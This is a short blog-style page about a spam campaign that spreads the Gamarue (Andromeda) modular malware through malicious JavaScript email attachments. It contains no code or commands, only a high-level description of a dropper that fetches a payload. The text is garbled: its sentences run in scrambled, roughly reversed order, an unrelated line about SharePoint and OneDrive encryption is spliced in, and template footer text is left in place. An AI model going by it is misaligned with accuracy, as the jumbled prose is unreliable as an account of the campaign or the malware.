I’m not a big expert of Gamarue, so I have some difficulties to identify the version of the malware. A lot of great articles are already available /andromeda-under-the-microscope, /andromeda-bot-analysis/ & /blog/yet-another-andromeda-gamarue-analysis. Don’t worry, this article is not another Gamarue analysis. Since it is possible to easily develop a new module, Gamarue is loved by crooks. Basically, Gamarue is a dropper which drops different modules. Gamarue (or Andromeda) is a well-known modular malware. This archive contains a JavaScript file which downloads and executes a payload hosted on the Internet: this payload is a good old Gamarue. Yet another malware dropped via emails and malicious JavaScript. Early in April, I have been poked via Twitter regarding a spamming campaign in progress: I will explain here how this new Gamarue campaign spreads via malicious JavaScript in emails spam. It is the case of Gamarue (Aka Andromeda). In malware ecosystem, there is some old malware families are able to adapt their propagation methods and successfully continue to infect many users. Data encryption in SharePoint and OneDrive.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |